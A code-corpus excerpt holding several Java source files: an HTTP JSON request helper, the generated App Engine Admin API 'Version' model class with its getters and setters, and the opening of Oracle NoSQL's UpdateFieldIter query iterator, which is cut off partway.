  /**
   * Sends an HTTP request and returns the response body as a JsonElement.
   *
   * @param method The HTTP method to use for the request.
   * @param baseUrl The base URL for the request.
   * @param headers The HTTP headers to include in the request; may be null, in which case an
   *     empty header set is used.
   * @param pathSegments Additional path segments to append to the base URL.
   * @return The response body as a JsonElement (never null; see throws).
   * @throws IOException If a network error occurs during the HTTP request, or the response body
   *     cannot be parsed as JSON.
   */
  private @Nullable JsonElement sendHttpRequestGetJson(
      HttpMethod method, HttpUrl baseUrl, HttpHeaders headers, String...
      pathSegments) throws IOException {
    if (headers == null) {
      headers = HttpHeaders.builder().build();
    }

    HttpUrl url = baseUrl;
    if (pathSegments.length > 0) {
      // addPathSegments splits on '/', so joining here appends each segment individually.
      url = url.newBuilder().addPathSegments(String.join("/", pathSegments)).build();
    }

    HttpRequest request =
        HttpRequest.builder().setHeaders(headers).setMethod(method).setUrl(url).build();
    HttpResponse response = this.httpClient.send(request);

    return response
        .bodyJson()
        .orElseThrow(() -> new IOException("Couldn't parse response body as JSON"));
  }

  /**
   * Pretty prints a JSON string.
   *
   * <p>Formats a given JSON string to a more readable form with proper indentation. If the input
   * string is not valid JSON, it returns the original string.
   *
   * @param json The JSON string to be pretty printed.
   * @return The pretty-printed version of the JSON string, or the original string if it's not valid
   *     JSON.
   */
  private String prettyPrintJson(String json) {
    try {
      Gson gson = new GsonBuilder().setPrettyPrinting().create();
      // NOTE(review): the JsonParser instance API is deprecated in recent Gson releases in favor
      // of the static JsonParser.parseString(json); left as-is to match the Gson version this
      // project pins.
      JsonParser jp = new JsonParser();
      JsonElement je = jp.parse(json);
      return gson.toJson(je);
    } catch (JsonParseException e) {
      return json;
    }
  }
}
googleapis/google-api-java-client-services
35,846
clients/google-api-services-appengine/v1/1.30.1/com/google/api/services/appengine/v1/model/Version.java
/* * Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except * in compliance with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software distributed under the License * is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express * or implied. See the License for the specific language governing permissions and limitations under * the License. */ /* * This code was generated by https://github.com/googleapis/google-api-java-client-services/ * Modify at your own risk. */ package com.google.api.services.appengine.v1.model; /** * A Version resource is a specific set of source code and configuration files that are deployed * into a service. * * <p> This is the Java data model class that specifies how to parse/serialize into the JSON that is * transmitted over HTTP when working with the App Engine Admin API. For a detailed explanation see: * <a href="https://developers.google.com/api-client-library/java/google-http-java-client/json">https://developers.google.com/api-client-library/java/google-http-java-client/json</a> * </p> * * @author Google, Inc. */ @SuppressWarnings("javadoc") public final class Version extends com.google.api.client.json.GenericJson { /** * Serving configuration for Google Cloud Endpoints * (https://cloud.google.com/appengine/docs/python/endpoints/).Only returned in GET requests if * view=FULL is set. * The value may be {@code null}. */ @com.google.api.client.util.Key private ApiConfigHandler apiConfig; /** * Automatic scaling is based on request rate, response latencies, and other application metrics. * Instances are dynamically created and destroyed as needed in order to handle traffic. * The value may be {@code null}. 
*/ @com.google.api.client.util.Key private AutomaticScaling automaticScaling; /** * A service with basic scaling will create an instance when the application receives a request. * The instance will be turned down when the app becomes idle. Basic scaling is ideal for work * that is intermittent or driven by user activity. * The value may be {@code null}. */ @com.google.api.client.util.Key private BasicScaling basicScaling; /** * Metadata settings that are supplied to this version to enable beta runtime features. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.util.Map<String, java.lang.String> betaSettings; /** * Environment variables available to the build environment.Only returned in GET requests if * view=FULL is set. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.util.Map<String, java.lang.String> buildEnvVariables; /** * Time that this version was created.@OutputOnly * The value may be {@code null}. */ @com.google.api.client.util.Key private String createTime; /** * Email address of the user who created this version.@OutputOnly * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.String createdBy; /** * Duration that static files should be cached by web proxies and browsers. Only applicable if the * corresponding StaticFilesHandler (https://cloud.google.com/appengine/docs/admin- * api/reference/rest/v1/apps.services.versions#StaticFilesHandler) does not specify its own * expiration time.Only returned in GET requests if view=FULL is set. * The value may be {@code null}. */ @com.google.api.client.util.Key private String defaultExpiration; /** * Code and application artifacts that make up this version.Only returned in GET requests if * view=FULL is set. * The value may be {@code null}. 
*/ @com.google.api.client.util.Key private Deployment deployment; /** * Total size in bytes of all the files that are included in this version and currently hosted on * the App Engine disk.@OutputOnly * The value may be {@code null}. */ @com.google.api.client.util.Key @com.google.api.client.json.JsonString private java.lang.Long diskUsageBytes; /** * Cloud Endpoints configuration.If endpoints_api_service is set, the Cloud Endpoints Extensible * Service Proxy will be provided to serve the API implemented by the app. * The value may be {@code null}. */ @com.google.api.client.util.Key private EndpointsApiService endpointsApiService; /** * The entrypoint for the application. * The value may be {@code null}. */ @com.google.api.client.util.Key private Entrypoint entrypoint; /** * App Engine execution environment for this version.Defaults to standard. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.String env; /** * Environment variables available to the application.Only returned in GET requests if view=FULL * is set. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.util.Map<String, java.lang.String> envVariables; /** * Custom static error pages. Limited to 10KB per page.Only returned in GET requests if view=FULL * is set. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.util.List<ErrorHandler> errorHandlers; static { // hack to force ProGuard to consider ErrorHandler used, since otherwise it would be stripped out // see https://github.com/google/google-api-java-client/issues/543 com.google.api.client.util.Data.nullOf(ErrorHandler.class); } /** * An ordered list of URL-matching patterns that should be applied to incoming requests. The first * matching URL handles the request and other request handlers are not attempted.Only returned in * GET requests if view=FULL is set. * The value may be {@code null}. 
*/ @com.google.api.client.util.Key private java.util.List<UrlMap> handlers; static { // hack to force ProGuard to consider UrlMap used, since otherwise it would be stripped out // see https://github.com/google/google-api-java-client/issues/543 com.google.api.client.util.Data.nullOf(UrlMap.class); } /** * Configures health checking for instances. Unhealthy instances are stopped and replaced with new * instances. Only applicable in the App Engine flexible environment.Only returned in GET requests * if view=FULL is set. * The value may be {@code null}. */ @com.google.api.client.util.Key private HealthCheck healthCheck; /** * Relative name of the version within the service. Example: v1. Version names can contain only * lowercase letters, numbers, or hyphens. Reserved names: "default", "latest", and any name with * the prefix "ah-". * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.String id; /** * Before an application can receive email or XMPP messages, the application must be configured to * enable the service. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.util.List<java.lang.String> inboundServices; /** * Instance class that is used to run this version. Valid values are: AutomaticScaling: F1, F2, * F4, F4_1G ManualScaling or BasicScaling: B1, B2, B4, B8, B4_1GDefaults to F1 for * AutomaticScaling and B1 for ManualScaling or BasicScaling. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.String instanceClass; /** * Configuration for third-party Python runtime libraries that are required by the * application.Only returned in GET requests if view=FULL is set. * The value may be {@code null}. 
*/ @com.google.api.client.util.Key private java.util.List<Library> libraries; static { // hack to force ProGuard to consider Library used, since otherwise it would be stripped out // see https://github.com/google/google-api-java-client/issues/543 com.google.api.client.util.Data.nullOf(Library.class); } /** * Configures liveness health checking for instances. Unhealthy instances are stopped and replaced * with new instancesOnly returned in GET requests if view=FULL is set. * The value may be {@code null}. */ @com.google.api.client.util.Key private LivenessCheck livenessCheck; /** * A service with manual scaling runs continuously, allowing you to perform complex initialization * and rely on the state of its memory over time. Manually scaled versions are sometimes referred * to as "backends". * The value may be {@code null}. */ @com.google.api.client.util.Key private ManualScaling manualScaling; /** * Full path to the Version resource in the API. Example: * apps/myapp/services/default/versions/v1.@OutputOnly * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.String name; /** * Extra network settings. Only applicable in the App Engine flexible environment. * The value may be {@code null}. */ @com.google.api.client.util.Key private Network network; /** * Files that match this pattern will not be built into this version. Only applicable for Go * runtimes.Only returned in GET requests if view=FULL is set. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.String nobuildFilesRegex; /** * Configures readiness health checking for instances. Unhealthy instances are not put into the * backend traffic rotation.Only returned in GET requests if view=FULL is set. * The value may be {@code null}. */ @com.google.api.client.util.Key private ReadinessCheck readinessCheck; /** * Machine resources for this version. Only applicable in the App Engine flexible environment. * The value may be {@code null}. 
*/ @com.google.api.client.util.Key private Resources resources; /** * Desired runtime. Example: python27. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.String runtime; /** * The version of the API in the given runtime environment. Please see the app.yaml reference for * valid values at https://cloud.google.com/appengine/docs/standard//config/appref * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.String runtimeApiVersion; /** * The channel of the runtime to use. Only available for some runtimes. Defaults to the default * channel. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.String runtimeChannel; /** * The path or name of the app's main executable. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.String runtimeMainExecutablePath; /** * Current serving status of this version. Only the versions with a SERVING status create * instances and can be billed.SERVING_STATUS_UNSPECIFIED is an invalid value. Defaults to * SERVING. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.String servingStatus; /** * Whether multiple requests can be dispatched to this version at once. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.Boolean threadsafe; /** * Serving URL for this version. Example: "https://myversion-dot-myservice-dot- * myapp.appspot.com"@OutputOnly * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.String versionUrl; /** * Whether to deploy this version in a container on a virtual machine. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.Boolean vm; /** * Enables VPC connectivity for standard apps. * The value may be {@code null}. 
*/ @com.google.api.client.util.Key private VpcAccessConnector vpcAccessConnector; /** * The Google Compute Engine zones that are supported by this version in the App Engine flexible * environment. Deprecated. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.util.List<java.lang.String> zones; /** * Serving configuration for Google Cloud Endpoints * (https://cloud.google.com/appengine/docs/python/endpoints/).Only returned in GET requests if * view=FULL is set. * @return value or {@code null} for none */ public ApiConfigHandler getApiConfig() { return apiConfig; } /** * Serving configuration for Google Cloud Endpoints * (https://cloud.google.com/appengine/docs/python/endpoints/).Only returned in GET requests if * view=FULL is set. * @param apiConfig apiConfig or {@code null} for none */ public Version setApiConfig(ApiConfigHandler apiConfig) { this.apiConfig = apiConfig; return this; } /** * Automatic scaling is based on request rate, response latencies, and other application metrics. * Instances are dynamically created and destroyed as needed in order to handle traffic. * @return value or {@code null} for none */ public AutomaticScaling getAutomaticScaling() { return automaticScaling; } /** * Automatic scaling is based on request rate, response latencies, and other application metrics. * Instances are dynamically created and destroyed as needed in order to handle traffic. * @param automaticScaling automaticScaling or {@code null} for none */ public Version setAutomaticScaling(AutomaticScaling automaticScaling) { this.automaticScaling = automaticScaling; return this; } /** * A service with basic scaling will create an instance when the application receives a request. * The instance will be turned down when the app becomes idle. Basic scaling is ideal for work * that is intermittent or driven by user activity. 
* @return value or {@code null} for none
 */
public BasicScaling getBasicScaling() {
  return basicScaling;
}

/**
 * A service with basic scaling will create an instance when the application receives a request.
 * The instance will be turned down when the app becomes idle. Basic scaling is ideal for work
 * that is intermittent or driven by user activity.
 * @param basicScaling basicScaling or {@code null} for none
 */
public Version setBasicScaling(BasicScaling basicScaling) {
  this.basicScaling = basicScaling;
  return this;
}

/**
 * Metadata settings that are supplied to this version to enable beta runtime features.
 * @return value or {@code null} for none
 */
public java.util.Map<String, java.lang.String> getBetaSettings() {
  return betaSettings;
}

/**
 * Metadata settings that are supplied to this version to enable beta runtime features.
 * @param betaSettings betaSettings or {@code null} for none
 */
public Version setBetaSettings(java.util.Map<String, java.lang.String> betaSettings) {
  this.betaSettings = betaSettings;
  return this;
}

/**
 * Environment variables available to the build environment. Only returned in GET requests if
 * view=FULL is set.
 * @return value or {@code null} for none
 */
public java.util.Map<String, java.lang.String> getBuildEnvVariables() {
  return buildEnvVariables;
}

/**
 * Environment variables available to the build environment. Only returned in GET requests if
 * view=FULL is set.
 * @param buildEnvVariables buildEnvVariables or {@code null} for none
 */
public Version setBuildEnvVariables(java.util.Map<String, java.lang.String> buildEnvVariables) {
  this.buildEnvVariables = buildEnvVariables;
  return this;
}

/**
 * Time that this version was created. @OutputOnly
 * @return value or {@code null} for none
 */
public String getCreateTime() {
  return createTime;
}

/**
 * Time that this version was created. @OutputOnly
 * @param createTime createTime or {@code null} for none
 */
public Version setCreateTime(String createTime) {
  this.createTime = createTime;
  return this;
}

/**
 * Email address of the user who created this version. @OutputOnly
 * @return value or {@code null} for none
 */
public java.lang.String getCreatedBy() {
  return createdBy;
}

/**
 * Email address of the user who created this version. @OutputOnly
 * @param createdBy createdBy or {@code null} for none
 */
public Version setCreatedBy(java.lang.String createdBy) {
  this.createdBy = createdBy;
  return this;
}

/**
 * Duration that static files should be cached by web proxies and browsers. Only applicable if the
 * corresponding StaticFilesHandler (https://cloud.google.com/appengine/docs/admin-
 * api/reference/rest/v1/apps.services.versions#StaticFilesHandler) does not specify its own
 * expiration time. Only returned in GET requests if view=FULL is set.
 * @return value or {@code null} for none
 */
public String getDefaultExpiration() {
  return defaultExpiration;
}

/**
 * Duration that static files should be cached by web proxies and browsers. Only applicable if the
 * corresponding StaticFilesHandler (https://cloud.google.com/appengine/docs/admin-
 * api/reference/rest/v1/apps.services.versions#StaticFilesHandler) does not specify its own
 * expiration time. Only returned in GET requests if view=FULL is set.
 * @param defaultExpiration defaultExpiration or {@code null} for none
 */
public Version setDefaultExpiration(String defaultExpiration) {
  this.defaultExpiration = defaultExpiration;
  return this;
}

/**
 * Code and application artifacts that make up this version. Only returned in GET requests if
 * view=FULL is set.
 * @return value or {@code null} for none
 */
public Deployment getDeployment() {
  return deployment;
}

/**
 * Code and application artifacts that make up this version. Only returned in GET requests if
 * view=FULL is set.
 * @param deployment deployment or {@code null} for none
 */
public Version setDeployment(Deployment deployment) {
  this.deployment = deployment;
  return this;
}

/**
 * Total size in bytes of all the files that are included in this version and currently hosted on
 * the App Engine disk. @OutputOnly
 * @return value or {@code null} for none
 */
public java.lang.Long getDiskUsageBytes() {
  return diskUsageBytes;
}

/**
 * Total size in bytes of all the files that are included in this version and currently hosted on
 * the App Engine disk. @OutputOnly
 * @param diskUsageBytes diskUsageBytes or {@code null} for none
 */
public Version setDiskUsageBytes(java.lang.Long diskUsageBytes) {
  this.diskUsageBytes = diskUsageBytes;
  return this;
}

/**
 * Cloud Endpoints configuration. If endpoints_api_service is set, the Cloud Endpoints Extensible
 * Service Proxy will be provided to serve the API implemented by the app.
 * @return value or {@code null} for none
 */
public EndpointsApiService getEndpointsApiService() {
  return endpointsApiService;
}

/**
 * Cloud Endpoints configuration. If endpoints_api_service is set, the Cloud Endpoints Extensible
 * Service Proxy will be provided to serve the API implemented by the app.
 * @param endpointsApiService endpointsApiService or {@code null} for none
 */
public Version setEndpointsApiService(EndpointsApiService endpointsApiService) {
  this.endpointsApiService = endpointsApiService;
  return this;
}

/**
 * The entrypoint for the application.
 * @return value or {@code null} for none
 */
public Entrypoint getEntrypoint() {
  return entrypoint;
}

/**
 * The entrypoint for the application.
 * @param entrypoint entrypoint or {@code null} for none
 */
public Version setEntrypoint(Entrypoint entrypoint) {
  this.entrypoint = entrypoint;
  return this;
}

/**
 * App Engine execution environment for this version. Defaults to standard.
 * @return value or {@code null} for none
 */
public java.lang.String getEnv() {
  return env;
}

/**
 * App Engine execution environment for this version. Defaults to standard.
 * @param env env or {@code null} for none
 */
public Version setEnv(java.lang.String env) {
  this.env = env;
  return this;
}

/**
 * Environment variables available to the application. Only returned in GET requests if view=FULL
 * is set.
 * @return value or {@code null} for none
 */
public java.util.Map<String, java.lang.String> getEnvVariables() {
  return envVariables;
}

/**
 * Environment variables available to the application. Only returned in GET requests if view=FULL
 * is set.
 * @param envVariables envVariables or {@code null} for none
 */
public Version setEnvVariables(java.util.Map<String, java.lang.String> envVariables) {
  this.envVariables = envVariables;
  return this;
}

/**
 * Custom static error pages. Limited to 10KB per page. Only returned in GET requests if view=FULL
 * is set.
 * @return value or {@code null} for none
 */
public java.util.List<ErrorHandler> getErrorHandlers() {
  return errorHandlers;
}

/**
 * Custom static error pages. Limited to 10KB per page. Only returned in GET requests if view=FULL
 * is set.
 * @param errorHandlers errorHandlers or {@code null} for none
 */
public Version setErrorHandlers(java.util.List<ErrorHandler> errorHandlers) {
  this.errorHandlers = errorHandlers;
  return this;
}

/**
 * An ordered list of URL-matching patterns that should be applied to incoming requests. The first
 * matching URL handles the request and other request handlers are not attempted. Only returned in
 * GET requests if view=FULL is set.
 * @return value or {@code null} for none
 */
public java.util.List<UrlMap> getHandlers() {
  return handlers;
}

/**
 * An ordered list of URL-matching patterns that should be applied to incoming requests. The first
 * matching URL handles the request and other request handlers are not attempted. Only returned in
 * GET requests if view=FULL is set.
 * @param handlers handlers or {@code null} for none
 */
public Version setHandlers(java.util.List<UrlMap> handlers) {
  this.handlers = handlers;
  return this;
}

/**
 * Configures health checking for instances. Unhealthy instances are stopped and replaced with new
 * instances. Only applicable in the App Engine flexible environment. Only returned in GET requests
 * if view=FULL is set.
 * @return value or {@code null} for none
 */
public HealthCheck getHealthCheck() {
  return healthCheck;
}

/**
 * Configures health checking for instances. Unhealthy instances are stopped and replaced with new
 * instances. Only applicable in the App Engine flexible environment. Only returned in GET requests
 * if view=FULL is set.
 * @param healthCheck healthCheck or {@code null} for none
 */
public Version setHealthCheck(HealthCheck healthCheck) {
  this.healthCheck = healthCheck;
  return this;
}

/**
 * Relative name of the version within the service. Example: v1. Version names can contain only
 * lowercase letters, numbers, or hyphens. Reserved names: "default", "latest", and any name with
 * the prefix "ah-".
 * @return value or {@code null} for none
 */
public java.lang.String getId() {
  return id;
}

/**
 * Relative name of the version within the service. Example: v1. Version names can contain only
 * lowercase letters, numbers, or hyphens. Reserved names: "default", "latest", and any name with
 * the prefix "ah-".
 * @param id id or {@code null} for none
 */
public Version setId(java.lang.String id) {
  this.id = id;
  return this;
}

/**
 * Before an application can receive email or XMPP messages, the application must be configured to
 * enable the service.
 * @return value or {@code null} for none
 */
public java.util.List<java.lang.String> getInboundServices() {
  return inboundServices;
}

/**
 * Before an application can receive email or XMPP messages, the application must be configured to
 * enable the service.
 * @param inboundServices inboundServices or {@code null} for none
 */
public Version setInboundServices(java.util.List<java.lang.String> inboundServices) {
  this.inboundServices = inboundServices;
  return this;
}

/**
 * Instance class that is used to run this version. Valid values are: AutomaticScaling: F1, F2,
 * F4, F4_1G ManualScaling or BasicScaling: B1, B2, B4, B8, B4_1G. Defaults to F1 for
 * AutomaticScaling and B1 for ManualScaling or BasicScaling.
 * @return value or {@code null} for none
 */
public java.lang.String getInstanceClass() {
  return instanceClass;
}

/**
 * Instance class that is used to run this version. Valid values are: AutomaticScaling: F1, F2,
 * F4, F4_1G ManualScaling or BasicScaling: B1, B2, B4, B8, B4_1G. Defaults to F1 for
 * AutomaticScaling and B1 for ManualScaling or BasicScaling.
 * @param instanceClass instanceClass or {@code null} for none
 */
public Version setInstanceClass(java.lang.String instanceClass) {
  this.instanceClass = instanceClass;
  return this;
}

/**
 * Configuration for third-party Python runtime libraries that are required by the
 * application. Only returned in GET requests if view=FULL is set.
 * @return value or {@code null} for none
 */
public java.util.List<Library> getLibraries() {
  return libraries;
}

/**
 * Configuration for third-party Python runtime libraries that are required by the
 * application. Only returned in GET requests if view=FULL is set.
 * @param libraries libraries or {@code null} for none
 */
public Version setLibraries(java.util.List<Library> libraries) {
  this.libraries = libraries;
  return this;
}

/**
 * Configures liveness health checking for instances. Unhealthy instances are stopped and replaced
 * with new instances. Only returned in GET requests if view=FULL is set.
 * @return value or {@code null} for none
 */
public LivenessCheck getLivenessCheck() {
  return livenessCheck;
}

/**
 * Configures liveness health checking for instances. Unhealthy instances are stopped and replaced
 * with new instances. Only returned in GET requests if view=FULL is set.
 * @param livenessCheck livenessCheck or {@code null} for none
 */
public Version setLivenessCheck(LivenessCheck livenessCheck) {
  this.livenessCheck = livenessCheck;
  return this;
}

/**
 * A service with manual scaling runs continuously, allowing you to perform complex initialization
 * and rely on the state of its memory over time. Manually scaled versions are sometimes referred
 * to as "backends".
 * @return value or {@code null} for none
 */
public ManualScaling getManualScaling() {
  return manualScaling;
}

/**
 * A service with manual scaling runs continuously, allowing you to perform complex initialization
 * and rely on the state of its memory over time. Manually scaled versions are sometimes referred
 * to as "backends".
 * @param manualScaling manualScaling or {@code null} for none
 */
public Version setManualScaling(ManualScaling manualScaling) {
  this.manualScaling = manualScaling;
  return this;
}

/**
 * Full path to the Version resource in the API. Example:
 * apps/myapp/services/default/versions/v1. @OutputOnly
 * @return value or {@code null} for none
 */
public java.lang.String getName() {
  return name;
}

/**
 * Full path to the Version resource in the API. Example:
 * apps/myapp/services/default/versions/v1. @OutputOnly
 * @param name name or {@code null} for none
 */
public Version setName(java.lang.String name) {
  this.name = name;
  return this;
}

/**
 * Extra network settings. Only applicable in the App Engine flexible environment.
 * @return value or {@code null} for none
 */
public Network getNetwork() {
  return network;
}

/**
 * Extra network settings. Only applicable in the App Engine flexible environment.
 * @param network network or {@code null} for none
 */
public Version setNetwork(Network network) {
  this.network = network;
  return this;
}

/**
 * Files that match this pattern will not be built into this version. Only applicable for Go
 * runtimes. Only returned in GET requests if view=FULL is set.
 * @return value or {@code null} for none
 */
public java.lang.String getNobuildFilesRegex() {
  return nobuildFilesRegex;
}

/**
 * Files that match this pattern will not be built into this version. Only applicable for Go
 * runtimes. Only returned in GET requests if view=FULL is set.
 * @param nobuildFilesRegex nobuildFilesRegex or {@code null} for none
 */
public Version setNobuildFilesRegex(java.lang.String nobuildFilesRegex) {
  this.nobuildFilesRegex = nobuildFilesRegex;
  return this;
}

/**
 * Configures readiness health checking for instances. Unhealthy instances are not put into the
 * backend traffic rotation. Only returned in GET requests if view=FULL is set.
 * @return value or {@code null} for none
 */
public ReadinessCheck getReadinessCheck() {
  return readinessCheck;
}

/**
 * Configures readiness health checking for instances. Unhealthy instances are not put into the
 * backend traffic rotation. Only returned in GET requests if view=FULL is set.
 * @param readinessCheck readinessCheck or {@code null} for none
 */
public Version setReadinessCheck(ReadinessCheck readinessCheck) {
  this.readinessCheck = readinessCheck;
  return this;
}

/**
 * Machine resources for this version. Only applicable in the App Engine flexible environment.
 * @return value or {@code null} for none
 */
public Resources getResources() {
  return resources;
}

/**
 * Machine resources for this version. Only applicable in the App Engine flexible environment.
 * @param resources resources or {@code null} for none
 */
public Version setResources(Resources resources) {
  this.resources = resources;
  return this;
}

/**
 * Desired runtime. Example: python27.
 * @return value or {@code null} for none
 */
public java.lang.String getRuntime() {
  return runtime;
}

/**
 * Desired runtime. Example: python27.
 * @param runtime runtime or {@code null} for none
 */
public Version setRuntime(java.lang.String runtime) {
  this.runtime = runtime;
  return this;
}

/**
 * The version of the API in the given runtime environment. Please see the app.yaml reference for
 * valid values at https://cloud.google.com/appengine/docs/standard//config/appref
 * @return value or {@code null} for none
 */
public java.lang.String getRuntimeApiVersion() {
  return runtimeApiVersion;
}

/**
 * The version of the API in the given runtime environment. Please see the app.yaml reference for
 * valid values at https://cloud.google.com/appengine/docs/standard//config/appref
 * @param runtimeApiVersion runtimeApiVersion or {@code null} for none
 */
public Version setRuntimeApiVersion(java.lang.String runtimeApiVersion) {
  this.runtimeApiVersion = runtimeApiVersion;
  return this;
}

/**
 * The channel of the runtime to use. Only available for some runtimes. Defaults to the default
 * channel.
 * @return value or {@code null} for none
 */
public java.lang.String getRuntimeChannel() {
  return runtimeChannel;
}

/**
 * The channel of the runtime to use. Only available for some runtimes. Defaults to the default
 * channel.
 * @param runtimeChannel runtimeChannel or {@code null} for none
 */
public Version setRuntimeChannel(java.lang.String runtimeChannel) {
  this.runtimeChannel = runtimeChannel;
  return this;
}

/**
 * The path or name of the app's main executable.
 * @return value or {@code null} for none
 */
public java.lang.String getRuntimeMainExecutablePath() {
  return runtimeMainExecutablePath;
}

/**
 * The path or name of the app's main executable.
 * @param runtimeMainExecutablePath runtimeMainExecutablePath or {@code null} for none
 */
public Version setRuntimeMainExecutablePath(java.lang.String runtimeMainExecutablePath) {
  this.runtimeMainExecutablePath = runtimeMainExecutablePath;
  return this;
}

/**
 * Current serving status of this version. Only the versions with a SERVING status create
 * instances and can be billed. SERVING_STATUS_UNSPECIFIED is an invalid value. Defaults to
 * SERVING.
 * @return value or {@code null} for none
 */
public java.lang.String getServingStatus() {
  return servingStatus;
}

/**
 * Current serving status of this version. Only the versions with a SERVING status create
 * instances and can be billed. SERVING_STATUS_UNSPECIFIED is an invalid value. Defaults to
 * SERVING.
 * @param servingStatus servingStatus or {@code null} for none
 */
public Version setServingStatus(java.lang.String servingStatus) {
  this.servingStatus = servingStatus;
  return this;
}

/**
 * Whether multiple requests can be dispatched to this version at once.
 * @return value or {@code null} for none
 */
public java.lang.Boolean getThreadsafe() {
  return threadsafe;
}

/**
 * Whether multiple requests can be dispatched to this version at once.
 * @param threadsafe threadsafe or {@code null} for none
 */
public Version setThreadsafe(java.lang.Boolean threadsafe) {
  this.threadsafe = threadsafe;
  return this;
}

/**
 * Serving URL for this version. Example: "https://myversion-dot-myservice-dot-
 * myapp.appspot.com" @OutputOnly
 * @return value or {@code null} for none
 */
public java.lang.String getVersionUrl() {
  return versionUrl;
}

/**
 * Serving URL for this version. Example: "https://myversion-dot-myservice-dot-
 * myapp.appspot.com" @OutputOnly
 * @param versionUrl versionUrl or {@code null} for none
 */
public Version setVersionUrl(java.lang.String versionUrl) {
  this.versionUrl = versionUrl;
  return this;
}

/**
 * Whether to deploy this version in a container on a virtual machine.
 * @return value or {@code null} for none
 */
public java.lang.Boolean getVm() {
  return vm;
}

/**
 * Whether to deploy this version in a container on a virtual machine.
 * @param vm vm or {@code null} for none
 */
public Version setVm(java.lang.Boolean vm) {
  this.vm = vm;
  return this;
}

/**
 * Enables VPC connectivity for standard apps.
 * @return value or {@code null} for none
 */
public VpcAccessConnector getVpcAccessConnector() {
  return vpcAccessConnector;
}

/**
 * Enables VPC connectivity for standard apps.
 * @param vpcAccessConnector vpcAccessConnector or {@code null} for none
 */
public Version setVpcAccessConnector(VpcAccessConnector vpcAccessConnector) {
  this.vpcAccessConnector = vpcAccessConnector;
  return this;
}

/**
 * The Google Compute Engine zones that are supported by this version in the App Engine flexible
 * environment. Deprecated.
 * @return value or {@code null} for none
 */
public java.util.List<java.lang.String> getZones() {
  return zones;
}

/**
 * The Google Compute Engine zones that are supported by this version in the App Engine flexible
 * environment. Deprecated.
 * @param zones zones or {@code null} for none
 */
public Version setZones(java.util.List<java.lang.String> zones) {
  this.zones = zones;
  return this;
}

@Override
public Version set(String fieldName, Object value) {
  return (Version) super.set(fieldName, value);
}

@Override
public Version clone() {
  return (Version) super.clone();
}

}
oracle/nosql
35,797
kvmain/src/main/java/oracle/kv/impl/query/runtime/UpdateFieldIter.java
/*-
 * Copyright (C) 2011, 2025 Oracle and/or its affiliates. All rights reserved.
 *
 * This file was distributed by Oracle as part of a version of Oracle NoSQL
 * Database made available at:
 *
 * http://www.oracle.com/technetwork/database/database-technologies/nosqldb/downloads/index.html
 *
 * Please see the LICENSE file included in the top-level directory of the
 * appropriate version of Oracle NoSQL Database for a copy of the license and
 * additional information.
 */

package oracle.kv.impl.query.runtime;

import java.io.DataInput;
import java.io.DataOutput;
import java.io.IOException;
import java.math.BigDecimal;
import java.util.ArrayList;
import java.util.List;
import java.util.Map;
import java.util.Objects;
import java.util.Set;

import oracle.kv.impl.api.table.ArrayValueImpl;
import oracle.kv.impl.api.table.DisplayFormatter;
import oracle.kv.impl.api.table.FieldDefImpl;
import oracle.kv.impl.api.table.FieldValueImpl;
import oracle.kv.impl.api.table.JsonCollectionRowImpl;
import oracle.kv.impl.api.table.JsonDefImpl;
import oracle.kv.impl.api.table.MapValueImpl;
import oracle.kv.impl.api.table.NullValueImpl;
import oracle.kv.impl.api.table.RecordValueImpl;
import oracle.kv.impl.api.table.RowImpl;
import oracle.kv.impl.api.table.TableImpl;
import oracle.kv.impl.api.table.TablePath;
import oracle.kv.impl.api.table.Region;
import oracle.kv.impl.query.QueryException;
import oracle.kv.impl.query.QueryStateException;
import oracle.kv.impl.query.compiler.Expr;
import oracle.kv.impl.query.compiler.Expr.UpdateKind;
import oracle.kv.table.FieldValue;

/**
 * Plan iterator implementing a single update clause of an UPDATE statement.
 *
 * theUpdateKind:
 * The update kind (one of SET, ADD, PUT, JSON_MERGE_PATCH, or REMOVE)
 *
 * theInputIter:
 * Computes the target expression
 *
 * thePosIter:
 * Computes the position expression of an ADD clause, if present.
 *
 * theNewValueIter:
 * Computes the replacement values, in case of SET, or the new values, in
 * case of ADD/PUT. It's null for REMOVE. In case of SET for an MR_COUNTER
 * column, theNewValueIter is actually the iter that computes the increment
 * or decrement on the column.
 *
 * theTargetItemReg:
 * The register to store the value of the $ variable.
 *
 * theJsonMRCounterColPos:
 * If this update clause is a SET that updates a json column with MRCounters,
 * or updates something inside such a column, jsonMRCounterColPos will be the
 * position of this column in the row.
 *
 * theIsJsonMRCounterUpdate:
 * True if this update clause is a SET that updates a json MRCounter.
 */
public class UpdateFieldIter extends PlanIter {

    /*
     * Per-execution mutable state: the row being updated, the context of the
     * most recently visited parent item, and the keys/positions collected for
     * deferred removal (see the REMOVE case in next()).
     */
    static private class UpdateFieldState extends PlanIterState {

        RowImpl theRow;

        ParentItemContext theParentItemContext;

        final ArrayList<String> theKeysToRemove;

        final ArrayList<Integer> thePositionsToRemove;

        UpdateFieldState() {
            theParentItemContext = new ParentItemContext();
            theKeysToRemove = new ArrayList<String>(32);
            thePositionsToRemove = new ArrayList<Integer>(32);
        }

        @Override
        public void reset(PlanIter iter) {
            super.reset(iter);
            theParentItemContext.reset();
            theKeysToRemove.clear();
            thePositionsToRemove.clear();
